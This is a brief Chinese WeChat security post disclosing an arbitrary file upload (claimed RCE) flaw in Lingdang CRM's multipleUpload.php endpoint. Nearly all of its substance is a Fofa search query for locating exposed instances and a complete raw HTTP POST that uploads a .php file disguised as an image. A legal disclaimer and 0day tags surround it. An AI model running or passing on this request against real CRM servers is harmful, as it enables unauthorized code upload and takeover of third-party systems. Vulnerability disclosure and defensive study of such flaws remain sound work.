点击上方蓝字关注我们 并设为星标
0x00 前言
灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长。灵当CRM multipleUpload.php接口处存在文件上传漏洞.
Fofa:body="include/js/ldAjax.js"
0x01 漏洞复现
Payload:
POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1
Host: xx.xx.xx.xxx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 171
Content-Type: multipart/form-data; boundary=56c3d565ed97bd2177f000e50a5b5029
--56c3d565ed97bd2177f000e50a5b5029
Content-Disposition: form-data; name="file"; filename="65.php"
Content-Type: image/png
test
--56c3d565ed97bd2177f000e50a5b5029--
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
PS:关注公众号,持续更新漏洞文章
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):灵当CRM存在任意文件上传漏洞(RCE)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论